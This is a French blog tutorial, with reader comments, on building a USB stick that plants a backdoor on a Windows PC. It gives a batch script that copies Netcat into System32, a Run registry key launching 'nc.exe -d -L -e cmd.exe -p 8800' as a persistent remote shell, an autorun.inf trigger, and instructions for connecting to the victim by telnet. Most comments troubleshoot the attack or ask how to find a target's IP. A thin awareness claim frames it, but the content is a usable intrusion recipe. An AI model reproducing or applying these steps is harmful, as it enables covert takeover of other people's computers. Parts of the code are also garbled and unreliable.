Dernière mise à jour : 10 juillet 2023
Dans les articles précédents, nous avons vu comment créer une Clé USB rootkit qui récupère les mots de passe d’un ordinateur sous Windows. Aujourd’hui, nous allons voir comment créer une clé USB qui ouvre un backdoor sur une machine Windows.
Ce rootkit s’exécute automatiquement, crée une porte dérobée sur un PC Windows et vous permet de prendre le contrôle à distance.
Comme d'habitude l’objectif ce tutoriel, c'est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers.
Prendre le contrôle d'un PC à distance
Pour prendre le contrôle d'un PC à distance avec une Clé USB, il faut suivre les étapes ci-dessus:
Télécharger l'outil Netcat
Tout d'abord, nous allons créer un nouveau dossier sur notre clé USB. Ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.
Vous pouvez aussi utiliser l'outil Cryptcat, le clone de Netcat, à la seule condition que ce dernier chiffre ses communications.
Télécharger Netcat pour windows
Apres le téléchargement de Netcat, on le dé-zippe dans le dossier crée récemment.
Créer un script .bat
Ensuite nous allons créer un fichier backdoor.bat. Ce petit fichier à deux objectifs:
- Copier les fichiers du Netcat dans le dossier System32 de l’ordinateur cible.
- Ajouter une valeur chaîne dans le registre du PC victime pour que notre porte dérobée se lance à chaque démarrage.
Pour cela, nous allons créer un nouveau document texte avec l'éditeur de texte Bloc-notes ou autre éditeur de texte et coller le code ci-dessous:
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v "backdoor" /t "REG_SZ" /d "%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800"
Créer un fichier autorun
Maintenant, il nous reste de créer le fichier autorun.inf.
Dans cette étape, nous allons créer une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Pour réaliser ceci, ouvrez un nouveau document texte puis insérez ce code :
open=backdoor.bat
ACTION="donner un nom à cette action"
Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf
Mettre en ouvre le backdoor crée
Après l'insertion de la clé USB, vous pouvez à partir de n’importe quelle machine vous connectez sur le poste de la victime avec la commande suivante:
192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c'est le port utiliser pour se connecter.
Et voilà ! Avec cette technique vous serez en mesure de prendre le contrôle d'un PC à distance. Vous pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme...
Voici une liste des commandes pour bien manipuler la machine à distance: Lise des commandes Windows.
Pour vous déconnecter, tapez « logout » .
Faites-en bon usage.
J’ai pas totalement comment faire la connexion
Même si on enleve la clé on est tjrs connecté ?
Et aussi a quel niveau il fait mettre le code?
Vers l’invite de commande ou le netcap?
bonjour est ce que il y a un moyen de faire la meme chose mais sur windows 10?
Bonjour quand je veut me connecter a netcat ou autre il me demande un code et je ne le trouve pas
Je ne comprend pas. Où trouver le port ? et où faut-il insérer la commande telnet … dans la cmd ?
bonjour, le dossier autorun.inf ne fonctionne pas, je l’enregistre sous ,
autorun.inf et je le met directement sur ma clé usb, mais à l’insertion
de la clé usb, rien ne s’affiche. un peu d’aide svp ??Et la commande telnet 192.168.1.17 880 , il faut la taper dans CMD ??
tu est sur windows 10 je suppose? PARCE QUE SUR windows 10 ils on suprimer .inf car c’etait la porte ouverte a tout les hacker
les liens sont mort
non.
Ahmed bonjour,
Article très intérèssant, un seul souci ça ne fonctionne pas, j’explique mon problème.
J’ai un vieux pc xp sur lequel j’ai introduit la backdoor en suivant à la lettre ton tuto.
Lorsque je lance telnet sous ubuntu celui ci ne peut résoudre l’adresse ip du xp
telnet: could not resolve xxx.xxx.x.xx…8800/telnet: Name or service not
un ipconfig dans la console du xp me confirme pourtant que c’est la bonne.
Une idée ?
Par avance merci et bonne soirée
C’est pas un antislash qu’il doit y avoir là ?
copy *.* « %SYSTEMROOT%/System32 »
copy *.* « %SYSTEMROOT%/System32 »
copy *.* « %SYSTEMROOT%/System32 »
??
Sinon manque plus qu’a le configurer pour piquer l’IP de l’ordinateur cible 🙂
Bonjour, je m’intéresse à la sécurité informatique et j’aurais voulu savoir si on crée une backdoor dans un ordi. Cela pose un problème car on ouvre un port ici le 8800 , donc n’importe qui peut s’y connecter si il envoie des requetes et vois le port ?
Merci
Salut a tous . Excuser moi pour avoir totalement acces a ce ordinateur a distance , ai je besoin d’internet ?
Exactement, vous aurez besoin d’une connexion internet.
Bonjour, quand j’entre la commande dans NetCat, le programme retourne « lookup failed errno 1004 NO_NATA » quelque chose comme ça… Pouvez-vous m’aider svp?
Bonjour. J’ai un petit soucis avec cette backdoor. J’ai suivi chaques étapes de la procédure, mais lorsque je branche ma clé USB dans un autre ordinateur, aucune option ne s’affiche pour ouvrir NetCat et avoir accès à mon propre ordinateur. Que dois-je faire alors ? Merci de votre réponse !
Bonjour,
Il faut installer le logiciel portable « putty ».
Dans « ip adress » : l’addresse ip de l’ordinateur cible
Dans « port » : 8800
Et dans « connection type » : telnet
Faut-il absolument que le PC soit en fonction pour utiliser cela?
Bonjour,quand j’ai mis les fichiers pour créer le backdoor sur la clé USB,tous mes documents se sont transformés en raccourcis,ils ne sont plus utilisables.HELP MEEEEEEEEEEEEEE!!
J’ai essayé d’accéder à ma machine XP en suivant la procédure mais marche pas…même en désactivant pare feu et antivirus
Tu peux me donner le message d’erreur qui s’affiche quand tu essaie de te connecter avec telnet ?
Moi surtout j’aimerais savoir comment obtenir l’adresse ip du pc dont l’on a installer le backdoor ?
Si tu veux obtenir l’adresse ip d’un pc dans un réseau local, il suffit d’ouvrir le cmd et de taper la commande net view après tu fais un ping sur le nom de la machine.
Sinon si tu as le pc entre tes mains, tu peux simplement taper dans l’invite de commande : ipconfig et tu auras l’adresse IP
Quelle est la commande sous ubuntu ?